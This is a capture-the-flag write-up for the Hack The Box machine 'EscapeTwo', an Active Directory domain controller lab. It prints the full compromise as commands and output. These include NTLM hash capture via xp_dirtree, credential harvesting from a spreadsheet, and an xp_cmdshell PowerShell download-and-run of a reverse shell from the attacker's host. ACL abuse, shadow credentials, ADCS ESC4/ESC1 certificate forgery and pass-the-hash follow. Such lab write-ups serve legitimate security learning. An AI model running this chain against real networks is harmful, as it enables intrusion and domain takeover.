HTB - EscapeTwo
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 20:09:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T19:33:09
|_Not valid after: 2055-01-13T19:33:09
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)Summary
* Open ports: 53-88-135-139-389-445-464-593-636-1433-3268-3269-5985
* UDP open ports:
* Services: DNS - KERBEROS - LDAP - SMB - MSSQL - winRM - LDAPS
* Important notes: Domain: sequel.htb - DNS:DC01.sequel.htb - Microsoft SQL Server 2019hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $sudo sh -c "echo '$ip DC01 sequel.htb DC01.sequel.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $tail -n 1 /etc/hosts
10.10.11.51 DC01 sequel.htb DC01.sequel.htbFoothold
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
With the provided credentials, I will try to connect to services (SMB, MSSQL, LDAP, ..etc)
MSSQL
(impacket) ┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $mssqlclient.py sequel.htb/rose:KxEPkKe6R8su@dc01 -windows-auth
SQL (SEQUEL\rose guest@master)>I tried to steal NTLMv2 credentials using xp_dirtree function with SMBServer running on my attacking machine, Then I got the hash but couldn't crack it, So I decided to look for different things.
xp_dirtree \\10.10.16.75\file.txt
sudo impacket-smbserver -smb2support share $(pwd)
I moved then to dump LDAP data and begin to enumerate the domain with bloodhound.py
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ldapdomaindump ldap://$ip -u "sequel.htb\rose" -p 'KxEPkKe6R8su'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $bloodhound-python -u rose -p KxEPkKe6R8su -ns $ip -d sequel.htb -c all --zip
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ousAlso, I tried to get kerberoastable accounts, and I got two of them, but I couldn't crack their hashes, either.
It's worth nothing to Check for ADCS existence as it opens many avenues of we to find any misconfiguration associated with the templates
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nxc ldap 10.10.11.51 -u rose -p 'KxEPkKe6R8su' -M adcs
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.51 389 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
ADCS 10.10.11.51 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.51 389 DC01 Found PKI Enrollment Server: DC01.sequel.htb
ADCS 10.10.11.51 389 DC01 Found CN: sequel-DC01-CAI looked for SMB shares using my credentials and found I have access to two shared folders:
InAccounting Department, there is account.xlsx file. First, I tried to open it with Microsoft Excel or any xlsx viewer but it said the file is corrupted.
Since xlsx can be treated as zip file, I unzipped it and began to look for any interesting info.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $ls
accounting_2024.xlsx accounts.xlsx
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $unzip accounts.xlsx
Archive: accounts.xlsx
inflating: xl/workbook.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/sharedStrings.xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: docProps/custom.xml
inflating: [Content_Types].xml Inside xl/SharedStrings.xml, there are several credentials
Angela:0fwz7Q4mxxxxxx
0scar:86LxLBMxxxxxxx
kevin:Md9Wlq1xxxxxxxxx
sa:MSSQLP@xxxxxxxLateral Movement
Using sa account, I can log in to the MSSQL instance as an admin
Impacket version v0.12.0 has built-in commands to automate some attacks, I will use enable_xp_cmdshell
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svcI will host PowerShell reverse shell on my web server and download it to the machine
To generate a reverse shell:
python3 /opt/PowerJoker/PowerJoker.py -l 10.10.16.84 -p 1337Download and Execute the shell
SQL (sa dbo@master)> xp_cmdshell powershell -c iwr http://10.10.16.84/shell.ps1 -o C:\programdata\rev.ps1
SQL (sa dbo@master)> xp_cmdshell powershell -c C:\programdata\rev.ps1Receive Connection
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $rlwrap -cAr nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.84] from (UNKNOWN) [10.10.11.51] 54422
JokerShell C:\Windows\system32>Under C:\, there is SQL019 folder
JokerShell C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/5/2022 12:03 PM PerfLogs
d-r--- 1/4/2025 7:11 AM Program Files
d----- 6/9/2024 8:37 AM Program Files (x86)
d----- 6/8/2024 3:07 PM SQL2019
d-r--- 6/9/2024 6:42 AM Users
d----- 1/4/2025 8:10 AM WindowsI found sql configuration file, let's see its content
I found the credentials of sql_svc as which I'm running my shell
JokerShell C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
..snip..
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6Cxxxxxxxxx"With that password, I will try to spray other users in the system
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6xxxxxxxxxx'
*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
87443ae9f1bdec35xxxxxxxxxxxxxxxxUser Flag: 87443ae9f1bdec35xxxxxxxxxxxxxxxx
Privilege Escalation
I will use powerview.py to manually enumerate user's privileges
(powerview.py) ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $python3 /opt/powerview.py/powerview.py sequel.htb/ryan:'WqSZAF6Cyzzzzzzzz'@10.10.11.51
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Get-DomainUser -Identity ryan -Select ObjectSid
S-1-5-21-548670397-972687484-3496335370-1114Ryan has WriteOwner on Ca_svc
With these privileges, I will Add Ownership to Ryan, then give him fullcontrol and after that, I can perform Shadow Credentials, Reset Password or targeted Kerberosasting
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontrolGet NT hash of ca_svc using shadow credential attack
With ca_svc hash, I can authenticate to the domain and begin to enumerate ADCS
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerable
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
..snip..
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissionsSo, there is a template vulnerable to ESC4. That means I have permission to change the attribute associated with that template and make it vulnerable to ESC1
ESC1is an escalation of misconfigured template is allowed to supplysubject alternative nameand can be abused to add any user of the domain (Administrator) to the template and get certificate for them.
certipy req -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5xxxxxxxxxxxxx7fce -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htbGet administrator hash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb
[_] Using principal: administrator@sequel.htb
[_] Trying to get TGT...
[_] Got TGT
[_] Saved credential cache to 'administrator.ccache'
[_] Trying to retrieve NT hash for 'administrator'
[_] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed40xxxxxxxxxxxx┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u administrator -H 7a8d4e04986afa8ed40xxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
eff768f0b89d396c3xxxxxxxxxxxxxxxxxxRoot Flag: eff768f0b89d396c3xxxxxxxxxxxxxxxxxx
Last updated